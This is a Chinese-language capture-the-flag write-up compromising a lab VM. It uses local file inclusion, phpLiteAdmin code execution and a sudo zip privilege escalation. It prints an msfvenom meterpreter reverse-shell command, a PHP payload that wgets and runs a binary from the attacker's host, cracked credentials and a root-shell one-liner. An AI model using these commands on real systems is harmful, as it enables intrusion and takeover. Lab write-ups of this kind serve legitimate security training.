99

0x00 环境搭建

靶机:Vbox虚拟机
攻击机:kali、windows10
网络:桥接网卡
IP:192.168.1.38

0x01 信息收集

nmap扫描开放端口,开放22、80、111、36456端口
80是web端口

目录枚举
http://192.168.1.38/vendor/

有一个文件包含漏洞
http://192.168.1.38/view.php?page=../../etc/passwd

ID在一千以后的只有zico账户
查看了ssh的配置文件,貌似也没有啥发现

目录扫描一波发现dbadmin登录后台,随手测试admin..登录成功,貌似是一个数据库,可以直接写shell一波了。。

好吧,这个数据库连接工具没用过,刚刚看见有一个info表,里面有两个账户和密码

root:653F4B285089453FE00E2AAFAC573414
解密:34kroot34
zico:96781A607F4E9F5F423AC01F0DAB0EBD
解密:zico2215@

果断的上SSH…SSH连接不上,直接登录也失败。。??几个意思 我擦。。
还是写shell吧,找下绝对路径

0x02 获取webshell

网上搜索了一下phpLiteAdmin v1.9.3。。发现原来是sqlite的,还以为是mysql的,此版本存在远程代码执行漏洞
在数据库中创一个test.php的数据库,并且插入一个表,里面写一句话,发现了一个问题,数据库路径在/usr/下面,不是在网站目录下,所以无法执行

尝试自定义数据库路径
尝试创建一个自定义路径的数据库,但是/被吞了

使用msf生成一个反向壳shell,通过文件包含漏洞执行
生成shell

msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell.elf -a x64 --platform linux LHOST=192.168.1.23 LPORT=4444

msf监听

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x64/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.23
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > run

使用python搭建一个简易的web服务器

python -m SimpleHTTPServer 80

在数据库中插入一下数据

<?php system("cd /tmp; wget http://192.168.1.23:80/shell.elf; chmod a+x shell.elf; ./shell.elf"); ?>

进入tmp目录,下载反向壳shell,给运行权限,运行shell

msf接收反弹成功

0x04 提权

使用python返回一个回显窗口

python -c 'import pty;pty.spawn("/bin/bash")'

使用之前获取的账号和密码提权,提示登录失败..
查看家目录下,发现可以进zico目录,目录下有wordperss文件,
查看配置文件得到数据库zico的密码sWfCsfJSPV9H3AmQzw8

尝试su zico 用刚刚得到的密码,发现登录成功。。。

家目录有个to_do.txt

使用sudo -l查看可以使用root权限执行的命令

发现可以执行tar和zip

touch raj//创建一个文件
sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"

sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"


提权成功

0x05 总结

1、获取到webshell后还是得多多关注下家目录和网站根目录下是否有一些可以利用的东西.
2、以后做靶机提权也要用sudo -l,看看有没有啥命令是可以使用root权限执行的,
3、linux玩的还是不是很熟悉,如上的提权命令,百度一下,没有什么有用的文章去分析,只知道用.
4、文章中有其他不一样的方法,测试了一波后没成功(主要太晚了,不想继续测试了)
每次做靶机都是一次受打击和自闭的状态。。。